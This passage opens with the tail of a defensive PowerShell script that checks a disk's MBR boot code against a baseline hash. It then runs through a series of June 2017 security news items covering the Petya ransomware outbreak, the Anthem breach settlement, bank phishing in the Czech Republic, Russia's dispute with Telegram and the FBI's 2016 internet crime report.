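    if ($Sector.Length -ne 512) { throw "An MBR sector is exactly 512 bytes, got $($Sector.Length)" }

    # Classic MBR layout: 446 bytes bootstrap, 4 x 16-byte partition entries, 2-byte signature
    $bootCode = [byte[]]$Sector[0..445]
    $sha256   = [System.Security.Cryptography.SHA256]::Create()
    $bootHash = ConvertTo-Hex ($sha256.ComputeHash($bootCode))
    $sigValid = ($Sector[510] -eq 0x55) -and ($Sector[511] -eq 0xAA)

    $partitions = @()
    for ($i = 0; $i -lt 4; $i++) {
        $off  = 446 + (16 * $i)
        $type = $Sector[$off + 4]
        if ($type -eq 0) { continue }                      # empty entry
        $partitions += [pscustomobject]@{
            Index    = $i
            Bootable = ($Sector[$off] -eq 0x80)
            Type     = ('0x{0:X2}' -f $type)
            StartLba = [BitConverter]::ToUInt32($Sector, $off + 8)    # little-endian fields
            Sectors  = [BitConverter]::ToUInt32($Sector, $off + 12)
        }
    }

    [pscustomobject]@{
        SignatureValid = $sigValid
        BootCodeSha256 = $bootHash
        Partitions     = $partitions
    }
}

function Test-MbrAgainstBaseline {
    param([byte[]]$Sector, [string]$BaselineBootCodeSha256)
    $info = Get-MbrInfo -Sector $Sector
    if (-not $info.SignatureValid)                        { return 'ALERT: boot signature missing or corrupt' }
    if ($info.BootCodeSha256 -ne $BaselineBootCodeSha256) { return 'ALERT: bootstrap code differs from baseline' }
    return 'OK: MBR matches baseline'
}

# --- Constructed sample sector (not a real disk image) -----------------------
$sample = New-Object byte[] 512
for ($i = 0; $i -lt 446; $i++) { $sample[$i] = [byte]($i % 251) }   # deterministic filler, not executable code
$sample[446]     = 0x80                                               # bootable flag
$sample[446 + 4] = 0x07                                               # partition type: NTFS
[BitConverter]::GetBytes([uint32]2048).CopyTo($sample, 446 + 8)       # start LBA
[BitConverter]::GetBytes([uint32]204800).CopyTo($sample, 446 + 12)    # length in sectors
$sample[510] = 0x55; $sample[511] = 0xAA                              # boot signature

$baseline = (Get-MbrInfo -Sector $sample).BootCodeSha256              # record this on a clean host
Test-MbrAgainstBaseline -Sector $sample -BaselineBootCodeSha256 $baseline      # OK

# Simulate a bootstrap overwrite: first 16 bytes change, signature stays valid
$tampered = [byte[]]$sample.Clone()
for ($i = 0; $i -lt 16; $i++) { $tampered[$i] = 0xCC }
Test-MbrAgainstBaseline -Sector $tampered -BaselineBootCodeSha256 $baseline    # ALERT

# On a live host (elevated prompt) the first sector of disk 0 can be read with:
# $fs = [System.IO.FileStream]::new('\\.\PhysicalDrive0', 'Open', 'Read')
# $buf = New-Object byte[] 512; $null = $fs.Read($buf, 0, 512); $fs.Close()
```

Because the first-stage MBR code is replaced before the operating system ever boots, this kind of check is only useful as a periodic baseline comparison while Windows is still running, or from recovery media afterwards; the partition table is left intact by the described behaviour, which is why `Get-MbrInfo` reports it separately from the bootstrap hash.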

A few months later, Petya authors decided to bundle the malware with a ransomware family called Mischa, which would target individual files in the event the reboot failed. Thus, Mischa worked as an insurance policy, and the authors decided to adopt the Ransomware-as-a-Service business model.

By the end of 2016, another Petya variant called Goldeneye emerged, and researchers warned earlier this year of a malware variant called PetrWrap that was leveraging Petya and modifying it “on the fly” to control its execution.

According to Costin Raiu, director of Global Research and Analysis Team at Kaspersky Lab, the newly observed ransomware variant could be PetrWrap, and not the original Petya, while others say the ransomware variant is Petya.A. Raiu also notes that the sample he stumbled upon appears to have been compiled a week ago.

The Petya variant used in this attack demands a $300 ransom from its victims, and the first payments appear to have been made to the hardcoded Bitcoin wallet it uses.

According to Recorded Future's Liska, other payloads might also be used in the attack: "There are also reports that the payload includes a variant of Loki Bot in addition to the ransomware. Loki Bot is a banking trojan, it steals usernames and passwords as well as other personal data from the victim machine and sends it to a command and control host. Which means this attack not only could make the victim's machine inoperable, it could steal valuable information that an attacker can take advantage of during the confusion."


Ukraine Central Bank Says Cyberattack Hits Lenders

27.6.2017 securityweek Cyber
Ukraine's central bank on Tuesday said a cyberattack hit several lenders in the country, hindering operations and leading the regulator to warn other financial institutions to tighten security measures.

"The National Bank of Ukraine has warned banks... about an external hacker attack on the websites of some Ukrainian banks... which was carried out today," the bank said in a statement.

Banks were experiencing "difficulty in servicing customers and performing banking operations" due to the attacks, it said.

"All the financial market participants have taken steps to tighten security measures to counteract these hacker attacks," it said, adding that "banking infrastructure is securely protected" and further attacks "will be efficiently warded off."

Among the banks apparently affected was Oschadbank, one of Ukraine's largest, which said on its website that the attack had forced it to limit the services available to clients.

"The bank's services together with the National Bank of Ukraine are putting in maximum effort to reinstate access to all bank services," it said.

Earlier an attack was also reported by the power company in Kiev, Kyivenergo. "We were forced to turn off all of our computers," a company representative told Interfax Ukraine agency.

Ukraine's delivery service company Nova Poshta, which was also attacked Tuesday, identified the virus that hit its computers as Petya.A, a type of ransomware which locks users out of the system and demands purchase of a key to reinstate access.


Apple, Cisco Partner to Improve Cyber Insurance Policies

27.6.2017 securityweek Cyber
Cisco is getting ready for a new journey in cyber insurance, and Apple will be part of it, the company announced this week.

The company didn’t provide specific details on what its customers should be looking for, but David Ulevitch, Vice President for Cisco’s Security Business Group, mentioned in a blog post on Monday that the company is working with leading companies to build the architecture needed to offer "more robust" policies.

“We’re collaborating with insurance industry heavyweights to lead the way in developing the architecture that enables cyber insurance providers to offer more robust policies to our customers,” Ulevitch said.

He also noted that Cisco will enable “continuous security monitoring and a measurable reference architecture,” and that technologies from both Apple and Cisco will be included.

Ulevitch mentioned Cisco’s future cyber insurance intentions in a blog post announcing the Cisco Security Connector app for iPhone and iPad in the enterprise, the latest product to spawn from the company’s collaboration with Apple. Set to arrive this fall, the app should provide “visibility, control, and privacy for iOS devices.”

At a Cisco event in Las Vegas on Monday, Apple Chief Executive Officer Tim Cook reportedly said that the combination of technology Apple and Cisco offer should result in companies paying less for cyber insurance.

“If your enterprise or company is using Cisco and Apple, the combination should make that insurance cost significantly less for you,” Cook said. Cook made an appearance on stage at the Cisco Live 2017 show during Cisco CEO Chuck Robbins’ keynote address.

Apple and Cisco have been working together on cyber-security related areas for a couple of years. Earlier this month, they extended their “fast-lane” initiative to include business critical apps for macOS. The project is meant to help validate applications and devices that are optimized for Cisco networks.

Over the past years, Cisco has significantly increased its efforts in the cyber security area and appears determined to invest even more. More information on its plans should become public shortly, Ulevitch says: “This is just the beginning — stay tuned for more details in the coming months.”


Computer virus hits companies worldwide and tries to put them out of operation

27.6.2017 Novinky/Bezpečnost Viruses
Companies in a number of European countries became the target of a cyber attack on Tuesday. The Danish shipping company Maersk and the Russian oil giant Rosneft were affected. The attack was especially extensive in Ukraine, where the targets included the postal service, the largest electricity distribution company UkrEnergo and the central bank.
Also affected were the US multinational food conglomerate Mondelez, the leading carrier Maersk, the French building materials manufacturer St. Gobain, the Russian oil company Rosneft, the British advertising firm WPP and the aircraft manufacturer Antonov.

According to statements from the affected institutions in Ukraine, the actions of the unidentified attackers disrupted their operations. Affected were the state postal service, the largest state-owned bank Oschadbank, the largest energy distributor UkrEnergo and, at least partially, the government computer network.

The central bank said it had been targeted by an "unknown virus" and added in a statement that it believes it is sufficiently protected against cyber attacks. Russia's Rosneft had to switch to a backup control system because of the attack.

According to the Interfax-Ukraine agency, the virus behaves similarly to the WannaCry ransomware, whose authors demanded ransom from those attacked. Computer expert Alan Woodward of the University of Surrey confirmed this to the BBC.

"It seems to be a version of the ransomware that appeared last year. The criminals updated it early this year after some of its aspects were defeated. That ransomware was called Petya and its updated version Petrwap," Woodward said.


Cloudflare Launches New App Store for Websites, $100 Million Development Fund

27.6.2017 securityweek Safety

Cloudflare Launches New Website App Store and Partners With Venture Firms to Launch $100 Million Development Fund

In December 2016 Cloudflare acquired Eager, a firm with a system for developing apps and integrating them into websites. The outcome of that acquisition is launched today with Cloudflare Apps, a free platform that enables developers to build apps and make them available to the 6 million websites that use the Cloudflare network.

In effect, Cloudflare is relaunching its own app store; but in a format that it now intends to grow. It has partnered with its first three venture capital investors to support app developers from a new $100 million Cloudflare Development Fund. Qualified developers will now have the opportunity to receive a cash investment, marketing support, and technical advice from the participating venture capital partners.

That financing is in the same tradition as that used by Sun when it launched Java, by Apple when it launched the Apple Apps Platform, and by Salesforce when it launched force.com. "When we discussed our plans with our investors," Matthew Prince, co-founder and CEO of Cloudflare, told SecurityWeek, "it was their idea to establish financing to help developers produce the next big idea in value-added apps. Now, if a developer is interested in building some new app only made possible by the Cloudflare network, it can apply for financing to help make it possible."

The investors concerned are New Enterprise Associates (NEA), Venrock, and Pelion Venture Partners. "Cloudflare's app platform is an exciting opportunity for developers and investors," commented Bryan Roberts, Partner, Venrock. "Building on the success of other app platforms like Java and the iPhone App Store, Cloudflare is giving entrepreneurs the opportunity to rethink and shape how the next generation of Internet companies get built."

Cloudflare has long offered a few apps, but nothing that could be called a serious app store. This new venture is intended to change that with a completely new platform. "The Apps Platform is a collection of APIs that allow developers to easily produce apps that can run across the network," Prince told SecurityWeek. "It's similar to the platform built by Apple. We make it easy for the developers to produce apps, and easy for them to get paid for those apps. The existing apps will continue to work; but we believe this will enable a whole new class of website apps that couldn't exist without a network like Cloudflare that can efficiently deploy the code globally. The platform allows developers to take advantage of Cloudflare resources around the world, and then be able to make it much easier for anyone, whether a small niche WordPress site or a large organization, to use those apps."

"When you build a startup, you need three things: a way to efficiently reach customers, a way to get paid, and capital to finance your development," explained Prince. "Together the Cloudflare Apps Platform and Development Fund solve these three challenges."

The Cloudflare network comprises some 6 million website customers that use Cloudflare's approximately 115 worldwide data centers for security -- such as DDoS mitigation -- and performance optimization. The basic service is free, but more advanced options can be paid for.

The new app service will add app code to delivered customer web pages as the page passes through Cloudflare's data centers. This provides both flexibility and control. Developed apps can be added to websites by customers simply by specifying which sites or pages on which they should run. For the customer, everything is automatic and requires zero coding.

Traditionally, of course, apps introduce vulnerabilities. Android itself, for example, is quite secure; it is the Android apps that can introduce problems to the Android ecosystem. SecurityWeek asked Prince if the new app platform could introduce vulnerabilities either to the Cloudflare network or to its customers.

Potentially, yes, he admitted; but then explained Cloudflare's approach -- which is closer to Apple than it is to Android. "We've taken an approach similar to Apple. We review all apps before deployment, and each one is individually sandboxed and cannot affect any other app," he explained. The control element comes because no code is ever installed on the customer's website, merely added to the page between the website and the viewer's browser. This makes it even stronger than the walled garden, because without hacking Cloudflare itself, there is no possible equivalent to the iOS weak point, sideloading.

"If a vulnerability is ever discovered, much like Apple we can withdraw that application from any customer that is using it and prevent any other customer from using it in the future. So, while there is a potential that an app vulnerability may slip through the vetting and the static analysis that we do before it is delivered, it is never deployed software. The app is code that is running on our hardware and injected into web pages as they pass through our systems; and we can simply turn it off without any effect on the customer's website."

"VigLink [one of the three VC investors] has always focused on empowering publishers, and the launch of Cloudflare Apps is a watershed moment," enthuses Oliver Roup, CEO and founder. "Incremental publisher revenue is delivered without compromising user experience, now a single click away from more than 4 million of the web's savviest publishers. A better Internet isn't just faster and safer, it's more lucrative too."


Russian Oil Giant Rosneft Says Hit by 'Powerful' Cyberattack

27.6.2017 securityweek CyberWar
Russian oil giant Rosneft said Tuesday that its servers had suffered a "powerful" cyberattack, as the company is locked in a bitter court fight with the Russian conglomerate Sistema.

"A powerful hacking attack has been carried out against the company's servers," Rosneft said on Twitter, adding that it "hopes" the incident was "not connected to current legal proceedings".


China Agrees to Fight Corporate Hacking in Canada

27.6.2017 securityweek BigBrothers
China has pledged not to carry out state-sponsored cyberattacks against the intellectual property of Canadian firms, the two sides said Monday.

The agreement was reached as part of ongoing bilateral security and trade talks.

Western governments have accused Chinese hackers of stealing valuable proprietary technologies and business secrets from high-tech and pharmaceutical companies, as well as manufacturers.

Beijing has publicly denied wrongdoing.

China and Canada "agreed that neither country's government would conduct or knowingly support cyber-enabled theft of intellectual property, including trade secrets or other confidential business information, with the intent of providing competitive advantages to companies or commercial sectors," an official statement said.

Beijing has recently signed similar agreements with Australia, Britain, the United States and others -- all of which had accused China of wrongdoing.

In Canada, the most serious case involved the alleged hacking in 2014 of the National Research Council (NRC), which the country's electronic eavesdropping agency said was conducted by "a highly sophisticated Chinese state-sponsored actor."

The NRC partners with Canadian companies and academics on cutting-edge science and technology projects.

The deal comes as Canada and China consider entering free trade negotiations, and following blowback over China's recent purchases of Canadian companies.

Polls show Canadians are overwhelmingly wary of increased trade ties with China.

Opposition parties meanwhile raised concerns over the sale to China of two Canadian satellite and laser technology firms that also sell to Western militaries.

The bilateral security and trade talks held last week also touched on "mutual concerns" about rule of law issues, counter-terrorism, and combating transnational organized crime, the two sides said.

Beijing is pushing for an extradition treaty with Canada, but Ottawa has said it needs assurances that persons who are extradited get a fair trial and do not face the death penalty.


Google Gets Record-Breaking $2.7 Billion Fine for Manipulating Search Results
27.6.2017 thehackernews IT
Google has just lost its biggest regulatory battle!
Google has been hit with a record-breaking $2.7 billion (€2.42 billion) fine by the European antitrust officials for unfairly manipulating search results since 2008.
After a lengthy seven-year investigation, launched in 2010 after complaints from several rivals, the European Commission on Tuesday imposed this 'biggest ever financial penalty' on the internet tech giant for breaking EU competition law by using its search dominance to distort search-engine results and promote its own shopping comparison service at the top of all search results.
"Comparison shopping services rely to a large extent on traffic to be competitive," the European Commission says in a press release.
"The evidence shows that consumers click far more often on results that are more visible, i.e. the results appearing higher up in Google's search results. More traffic leads to more clicks and generates revenue."
The Commission says the amount of the penalty was calculated from Google's income from its comparison shopping service in Europe. Google's total revenue in 2016 was almost $90 billion.

Apart from the fine, the Commission has ordered Google to "stop its illegal conduct" and anti-competitive practices within a 3-month deadline or face a further penalty of up to 5% of the average daily worldwide turnover of Alphabet, Google's parent company.
So Google will now have to change its search ranking algorithm. However, the company can also appeal the decision in EU courts, delaying the resolution for years.
"We respectfully disagree with the conclusions announced today. We will review the Commission's decision in detail as we consider an appeal, and we look forward to continuing to make our case," a Google spokesperson said in a statement.
Moreover, Google is currently facing two other ongoing EU antitrust investigations.
One alleges that Google's Android unfairly forces cellphone manufacturers to preinstall Google services, promoting its products over rivals. The other targets its AdSense business.
The previous biggest antitrust fine was against U.S. chipmaker Intel in 2009, which was €1 billion.


Anthem agreed to pay $115m to settle a class-action suit brought on by the 2015 data breach
27.6.2017 securityaffairs Incident
Anthem, the largest US healthcare insurance company, has agreed to pay $115m to settle a class-action suit brought on by the 2015 data breach.

The attack on Anthem exposed 78.8 million records and, according to the experts who investigated the case, it was probably not a smash-and-grab raid but a sustained, low-key siphoning of information over a period of months. The attack was conducted to stay below the radar of the company's IT and security teams, using a bot infection to exfiltrate data out of the organization.

The records included names, dates of birth, addresses, and medical ID numbers; financial and medical records were not exposed.

Investigators reported that customized malware was used to infiltrate Anthem's networks and steal data. The exact malware type was not disclosed, but it is reported to be a variant of a known family of hacking tools. An independent security consultancy, however, reports that the attack may have started up to three months earlier: it said it noticed 'botnet type activity' at Anthem affiliate companies back in November 2014.

Back to the present, the settlement fund will cover costs incurred by victims of the breach.

According to the settlement’s “Alternative Compensation” section, customers who already received credit monitoring services can elect to receive a small cash compensation that ranges from $36 up to $50 in some instances.

Judge Lucy Koh of the US District Court for the Northern District of California will review the proposal; if approved, it could be the largest data breach settlement in history.

In March 2017, the US retail giant Target entered a settlement with the US Attorneys General and agreed to pay $18.5 million over its 2013 data breach.

“After two years of intensive litigation and hard work by the parties, we are pleased that consumers who were affected by this data breach will be protected going forward and compensated for past losses,” lead attorney Eve Cervantez said.


As is usually the case with settlements, Anthem will not have to admit to any wrongdoing.

The settlement was also generous with the attorneys: a third of the package, a total of $37,950,000, will cover their fees.

Experian, which is handling the credit and identity monitoring services for the victims of the Anthem data breach, will receive an additional $17m.


Human error is the root cause of password reset email sent to AA customers
27.6.2017 securityaffairs  Safety

UK car insurance company AA accidentally sent out a 'password update' email to its customers; the incident was caused by human error.
UK car insurance company AA accidentally sent out a "password update" email to its customers; the messages led motorists to log into the motoring organization's website to change their passwords. The concurrent access of such a large number of customers crashed the AA servers, so customers could not access their profiles and believed their accounts had been compromised by hackers.

In reality, the incident was caused by human error: according to AA, no passwords had been changed, and people could not access their accounts because the server was flooded with access requests.


The AA reassured its customers by confirming that the change-password messages had been sent out in error.

The AA (@TheAA_UK), 2:08 PM - 26 Jun 2017:
"The email was sent by us, but in error. Your password hasn't been changed, and your data remains secure. Sorry for any confusion."

At first, the company only confirmed that something strange was happening to its customers; the message it posted on Twitter led us to believe that its customers were being targeted by a phishing campaign.

The AA (@TheAA_UK), 10:05 AM - 26 Jun 2017:
"We're aware an email has been sent to members re password change Please don't ring the number in the email. We're looking into this urgently"
Further investigation revealed the password reset messages were triggered by an error made by an internal,

In summary, if you are an AA customer, ignore the password reset message sent by the company.


Gartner: Focus on these key security technologies

27.6.2017 SecurityWorld Security
Analysts at Gartner have compiled a selection of key security technologies that you should by no means ignore this year.

The first technology, or rather technology area, is Cloud Workload Protection Platforms (CWPP), which offer a unified way to protect cloud infrastructure across various hybrid environments that include private and public IaaS infrastructure from several providers.

Second on the list is remote browser technology, which limits the risk of attacks on the browser by isolating it from the rest of the user's system.

Third, Gartner's analysts list deception techniques, i.e. those that create a decoy target or lure, deflect or disrupt the course of an attack, possibly delay its potential impact, and allow the attack to be unambiguously detected.

Endpoint Detection and Response (EDR) extends traditional endpoint protection methods (such as antivirus) with functions based on monitoring events, unusual behaviour or potentially malicious activity; analysts estimate that by 2020 EDR will be used by 80% of large enterprises, 25% of mid-sized companies and 10% of small organisations.

Among the techniques somewhat more widespread in enterprises is Network Traffic Analysis (NTA), which monitors traffic, data flows, connections and objects for behaviour suggesting a possible attack.

Companies that want to handle threat detection, incident response and continuous monitoring better but lack the necessary specialists should look into Managed Detection and Response (MDR), a service popular especially with mid-sized companies that do not want to invest too heavily in detection and incident response.

Among the useful functions brought by the growing virtualisation of data centres, particularly of their network functions, is microsegmentation: creating relatively small, separate segments so that, in the event of an attack, damage is confined to a very small area.

Also virtual, but significantly different, are Software-Defined Perimeters (SDP): logical secure enclaves encompassing multiple remote participants. Their resources and components are usually hidden and can be accessed only through a trusted service (trust broker), which reduces the risk of attack.

As the number of applications run under the SaaS model and of their users grows, Cloud Access Security Brokers (CASB), which offer unified oversight across several cloud services, are becoming increasingly important.

Agility has long since ceased to rest on cloud applications alone, so DevOps, or rather DevSecOps, principles are also making their way into security: managing risk and regulatory compliance within the tools and processes of agile development. This is primarily a matter of software composition analysis and security scanning of open source for DevSecOps (OSS Security Scanning and Software Composition for DevSecOps).

Finally, the last information security technology IT managers should pay attention to is container security. Containers use a shared operating system model, so a vulnerability in the host OS can mean a vulnerability in all containers.

According to the analysts, the problem is not that containers are inherently insecure, but that developers often deploy them in ways that are not sufficiently secure, usually outside the oversight of information security teams or security architects.

Moreover, traditional security tools are "blind" to containers. Security solutions designed for containers, by contrast, are built to address protection across the entire lifecycle, with functions such as pre-production scanning as well as runtime monitoring and protection.


Another wave of phishing is spreading across the Czech Republic. A fraudulent e-mail poses as a message from KB
27.6.2017 CNEWS.cz Phishing

Komerční banka warns that someone is sending a fraudulent e-mail in its name, with the spoofed address mojebanka@kb.cz, alerting the recipient to an incoming international SWIFT payment. The user is told to find the details in the attachment. The attachment, however, is a 550 kB file named swift.jar containing the trojan Java/Kryptik.FF.

Kryptik is a very old trojan (it was spreading even before 2010), but Eset added its Java variant to its threat list only in June. What it does is not precisely documented, but like other Kryptiks it may open the computer's ports and ease access for hackers, send spam, log keystrokes and so on. Or it may simply open up the system for the distribution of further malware.

Phishing posing as a message from Komerční banka


Microsoft responds to Kaspersky. Most of the accusations swept off the table

27.6.2017 CNEWS.cz Software
Microsoft says it supports a rich ecosystem of security solutions and works with antivirus vendors to make their products work on Windows.
Kaspersky Lab is unhappy with Windows regarding access for antivirus solutions and in early June filed a complaint with the European Commission. You can read extensive articles on the topic on Cnews, and also listen to a podcast from a few days ago. A few days ago Microsoft responded to the security vendor on the Windows Security blog.

The post is long, but in short it says that Microsoft is trying to build a secure operating system and is "not ashamed" of that approach.

Defender's detection capabilities

Part of a secure Windows release is an antivirus for protection against malware. Eugene Kaspersky pointed out that in the past this solution received relatively weaker ratings than the competition. Microsoft, however, refers to a May test that is supposed to reflect real-world conditions.

According to AV-Comparatives, Defender did well not only in that test but generally in recent months, catching over 99% of malicious code. (In February, however, it was only 96.6%.) Let me point out, though, that the tests themselves need not have much explanatory value from an overall security standpoint. A former Mozilla employee cast doubt on the tests and on most antivirus products a few months ago.

The issue of rapid development and upgrades

Microsoft responds to the alleged unavailability of test versions of Windows by saying that it both releases new builds regularly and publicly through the Windows Insider program and works with antivirus vendors to identify significant changes in the system. According to Microsoft, development is more transparent than before, and in view of the faster pace it has doubled its efforts to support vendors.

For example, when it released the Creators Update, roughly 95% of the antivirus products used on Windows 10 machines were compatible with that version. Microsoft further states that for cases where an antivirus is not compatible, it created a function that ensures users are prompted to install the latest version of the antivirus after the upgrade. The original protection, however, is turned off so that the upgrade can proceed.

While Kaspersky claims that Microsoft simply removes antivirus products, Microsoft says it prompts the user to install a compatible version. It even maintains a list of compatible versions for this purpose, in cooperation with security vendors, so that it is unambiguous which versions of security products are compatible with new versions of Windows and where users should be directed for an upgrade.

What if the licence expires?

Microsoft further states that if the installed third-party protection is functional, Defender takes no action without approval. It does switch on, however, if the protection stops working, e.g. because a licence has expired. Redmond does not want to leave computers unprotected. Kaspersky complained that it cannot use its own licence-expiry notification. According to Microsoft, however, a standardised set of notifications was again created in cooperation with antivirus vendors, making it clear that a licence is about to expire.

It is also a larger notification that appears in the foreground in the centre of the screen. Although Kaspersky apparently really cannot use its flashing red exclamation marks to display the warning, neutral but sufficiently prominent licence-expiry notifications are shown. Those who want to can renew their licence. (A discussion about acting under duress could follow.)

Microsoft has thus swept most of Kaspersky's accusations off the table. What remains is the objection that Windows Defender should not claim in its main window that the computer is unprotected while other protection is functional. In the Creators Update, however, the older interface was replaced by the Security Center, and I will still have to verify whether this environment also takes a stance against functional third-party protection.


Fraudulent e-mails try to trick clients of Komerční banka

27.6.2017 Novinky/Bezpečnost Phishing
Users of Komerční banka's internet banking should be on their guard. They have been targeted by computer pirates who are trying to smuggle a malicious virus into their computers. In the next step, they try to rob them of their money.
Sample of the fraudulent e-mail
"We have currently registered fraudulent e-mails whose aim is to infect your computer with a virus. The fraudulent e-mail pretends to be sent from the e-mail address mojebanka@kb.cz," Komerční banka representatives warned.

The subject of the message reads "Informace o platbě" (Payment information). The computer pirates try to give the recipient of the fraudulent message the impression that a payment has been debited from the user's account. People are supposed to find the details in the e-mail attachment.

That is exactly where the catch lies. "Instead of the promised details, the attached file contains a computer virus that installs itself on your computer when run. We strongly warn you against opening this e-mail and its attachment," the bank's representatives stated.

Pirates are just a step away from the money
Through the virus, the computer pirates are just a step away from the money stored in the bank account. All they need is to obtain the confirmation SMS message in order to carry out practically any payment. And enslaving a smartphone is unfortunately no problem at all these days.

"If you have received the above e-mail or encountered any other suspicious e-mail and opened it, or opened an attachment contained in it, contact our internet banking client line at 955 551 552 immediately," the bank's representatives noted.

At present, such messages target exclusively clients of Komerční banka. It cannot be ruled out, however, that the cybercriminals' tactics will change in the foreseeable future and they will try to trick the clients of other banks via unsolicited e-mails.


Russian Gov is threatening to ban Telegram because it refused to comply with data protection laws
27.6.2017 securityaffairs CyberWar

Russia threatens to ban the Telegram instant messaging app because the company refused to comply with the country's new data protection laws.
The Russian Government is threatening to ban the popular Telegram instant messaging app because the company refused to comply with the country's new data protection laws.

Telegram has 6 million Russian users and, in order to protect their privacy, the company refused to comply with the data protection laws.


The Russian Personal Data Law has been in force since September 1st, 2015; it requires foreign tech companies to store the personal data of Russian citizens within the country. The law was designed to protect Russian citizens from the surveillance activities of foreign agencies such as the NSA.

Since January 1, the new Russian data protection laws have required foreign tech companies to store the past six months of Russians' personal data, along with encryption keys, within the country. The companies are obliged to provide access to the retained data if requested by the authorities.

"There is one demand, and it is simple: to fill in a form with information on the company that controls Telegram," said Alexander Zharov, head of the communications regulator Roskomnadzor (state communications watchdog).

“And to officially send it to Roskomnadzor to include this data in the registry of organizers of dissemination of information. In case of refusal… Telegram shall be blocked in Russia until we receive the needed information.”

According to the FSB, the Russian intelligence agency, the terrorists who killed 15 people in Saint Petersburg in April were communicating through the Telegram encrypted messaging service.

The Russian intelligence asked Telegram to share users’ chats and crypto keys on demand to allow government investigations on terrorists abusing the instant messaging app as a communication channel.

The use of the popular encrypted messaging app is widespread among the militants of the terrorist organization in Russia and abroad; the use of Telegram has eclipsed that of other social media platforms, including Twitter.

Social media platforms continue to ban content posted by members of ISIS in an attempt to block their propaganda online.

Twitter continues to close hundreds of thousands of accounts for violating the company’s policies on violent extremism. In August Twitter published a blog post that revealed it has shut down 360,000 terrorist-related accounts since last year.

The reason for the widespread use of Telegram is the company's lack of repressive measures against ISIS activities conducted through its application.

"[Telegram is] the app of choice for many Isis, pro-Isis and other jihadi and terrorist elements," states a report published by the Middle East Media Research Institute (MEMRI).

A previous report published by the MEMRI JTTM, titled “Jihadis Shift To Using Secure Communication App Telegram’s Channels Service” published October 29, 2015, noted that numerous jihadis and jihadi organizations had opened their own channels on Telegram.

Back to the present, Telegram founder Pavel Durov confirmed that other intelligence agencies have also asked for a backdoor in the popular encrypted messaging app.

Yasha Levine (@yashalevine), 10 Jun 2017:
"No backdoor needed. Enough bugs to go around. But there is a lot of backroom chatter between crypto app makers and their USG backers. https://twitter.com/durov/status/872891017418113024 …"

Pavel Durov (@durov), 1:45 PM - 11 Jun 2017:
"@yashalevine During our team's 1-week visit to the US last year we had two attempts to bribe our devs by US agencies + pressure on me from the FBI."
Telegram is not the only company targeted by the Russian data protection laws; in November, LinkedIn was banned in the country for not complying with them.


Pro-ISIS group defaced US Government websites in 3 states
27.6.2017 securityaffairs CyberWar

Several government websites, including that of Ohio Governor John Kasich, were hacked by a pro-ISIS group calling itself Team System DZ.
Several government websites in Ohio and Maryland, including the one belonging to Ohio Governor John Kasich, had to be shut down on Sunday after being defaced by pro-ISIS hackers. The hackers breached the websites and published messages supporting the Islamic State group.

The message posted on Kasich’s website also played an Islamic call to prayer.

The Kasich website (www.governor.ohio.gov) was taken offline on Sunday; it is now up and running again.


The hackers belong to a group calling itself Team System DZ; the group targeted the websites in retaliation for the policies of US President Donald Trump.

"You will be held accountable Trump, you and all your people for every drop of blood flowing in Muslim countries. I Love Islamic state," states the message posted by the group.

The hackers wrote the message in gold lettering on a black background.

The hackers also published the basic statement of the Islamic faith written in Arabic:

“there is no god but Allah and Muhammad is the prophet of Allah.”

Tom Hoyt, a spokesman for the Ohio Department of Administrative Services, said all affected servers were “taken offline” and law enforcement is investigating the cyberattacks.

“We also are working with law enforcement to better understand what happened,” Hoyt said.

Hackers also targeted a website for Howard County, Maryland.

“There was no breach of data and no personal information was compromised,” according to a statement from Howard County Executive Allan H. Kittleman. “Howard County government is working with law enforcement agencies and an investigation is underway. We apologize for any inconvenience.”

"Government websites in Ohio, Maryland and New York have been hacked with what appears to be pro-ISIS propaganda," CNN reported.

“On Sunday, visitors to governor.ohio.gov were greeted with a black background and an Arabic symbol while an Islamic call to prayer played in the background.”
The official website of the Town of Brookhaven, New York, was also hacked, and the hackers published the same messages that appeared on the other websites targeted by the pro-ISIS group.
Some of the websites were still down at the time of writing.


FBI: $1.45 Billion in Losses to Internet Crime Reported in 2016

26.6.2017 securityweek CyberCrime
The FBI has published its Internet Crime Report 2016 based on information received by the Internet Crime Complaint Center (IC3). It shows that 298,728 complaints were received by the IC3 during 2016 (up from 288,012 in 2015); and that reported losses to internet crime totaled more than $1.45 billion (up from $1.07 billion in 2015).

These figures, however, are likely to be only a fraction of the full picture. The FBI estimates that only 15 percent of the nation's fraud victims report their crimes to law enforcement. Nevertheless, by publishing this report, the FBI hopes to help law enforcement recognize and respond to developing trends in internet crime, and to help the public recognize scams before they become victims.

FBI IC3 Report on Cybercrime

"The 2016 Internet Crime Report," writes Scott Smith, assistant director, cyber division of the FBI in the report's introduction, "highlights the IC3's efforts in monitoring trending scams such as Business Email Compromise (BEC), ransomware, tech support fraud, and extortion."

He also notes, "This year's report features a section on the importance of law enforcement collaboration and partnerships with the private sector and Intelligence Community. For example, the FBI continues to expand Operation Wellspring (OWS), an initiative through which state and local law enforcement officers are embedded in, and trained by, FBI cyber task forces and serve as the primary case agents on Internet-facilitated criminal investigations. Overall, OWS task forces opened 37 investigations in 2016 and have worked 73 total investigations since OWS was launched in August 2013."

The most prolific crimes detailed and analyzed in the report are Business Email Compromise (BEC) and its personal equivalent, Email Account Compromise (EAC); ransomware; the tech support scam; and extortion.

The BEC scam, notes the report, "began to evolve in 2013 when victims indicated the email accounts of Chief Executive Officers or Chief Financial Officers of targeted businesses were hacked or spoofed, and wire payments were requested to be sent to fraudulent locations." Since then it has grown and evolved.

"In 2016, the scam evolved to include the compromise of legitimate business email accounts and requests for Personally Identifiable Information (PII) or Wage and Tax Statement (W-2) forms for employees." Last year, IC3 received 12,005 BEC/EAC complaints, with losses of more than $360 million.

Ransomware often receives greater publicity than BEC, but the instances and losses reported to the IC3 are smaller than those for BEC. "Recent iterations," says the report, "target specific organizations and their employees, making awareness and training a critical preventative measure. In 2016, the IC3 received 2,673 complaints identified as ransomware with losses of over $2.4 million."

Tech support fraud is surprisingly pervasive and effective. Few people will not have received a tech support cold call, but the ease and speed with which such calls are detected and dismissed is not consistent across the whole population. "Once the phony tech support company or representative makes verbal contact with the victim, the subject tries to convince the victim to provide remote access to their device. Once the subject has control, additional criminal activity occurs."

That activity could include demanding a ransom, stealing sensitive personal information, or installing malware. A more recent variation of this fraud convinces the victim to allow access to refund an overpayment for earlier services. "With this access, the subject claims to have 'mistakenly' refunded too much money to the victim's accounts, and requests the victim wire the difference back to the subject company."

In reality, the fraudster uses the provided access to make the 'refund' from a different account belonging to the victim. The victim sees the 'refund', doesn't recognize it as his/her own money, and wires the requested funds to the fraudster.

